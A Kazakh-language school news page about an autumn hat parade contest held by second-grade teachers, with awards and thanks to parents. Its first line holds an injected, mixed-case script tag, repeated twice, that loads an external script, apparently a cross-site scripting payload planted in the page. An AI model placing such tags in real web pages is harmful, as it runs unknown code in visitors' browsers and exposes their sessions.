<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

23.10.2017

Алтын күз келді! 21 қазан күні № 5 ОМ – те екінші сынып мұғалімдері «Күзгі қалпақ парад» сайысын ұйымдастырды. Сайыс қатысушылары 2 А, 2Б, 2В сынып оқушылары.  Ата -  аналар мен оқушылар іс – шараға шығармашылық фантазиямен дайындалып келді.  Қалпақты жасаған сәтте әр түрлі табиғи материалдар қолданылды: күзгі жапырақтар, ағаштар, жеміс – жидектер. Әр қалпақ өзінше әдемі болды.  Бір де бір қалпақ бір – біріне ұқсаған жоқ.  Іс – шара  қызықты болсын деп екінші сынып мұғалімдері Токпаева Ш.Т., Селина Н.В., Филонова В.В. іс – шараға әр түрлі сайыстар, қызықты эстафета , ойын және билер дайындап келді.  Іс – шара марапаттау мен аяқталды. Қатысушылар әр түрлі номинациялармен марапатталды: «Ең үздік қалпақ», «Ең әдемі қалпақ», «Жидекті қалпақ». Ата – аналарға осы іс –шараға белсенді қатысқандары үшін шексіз алғысымызды білдіреміз!

Просмотров: 1233


Пікір қосу



Деректерді қолтаңбаға қосу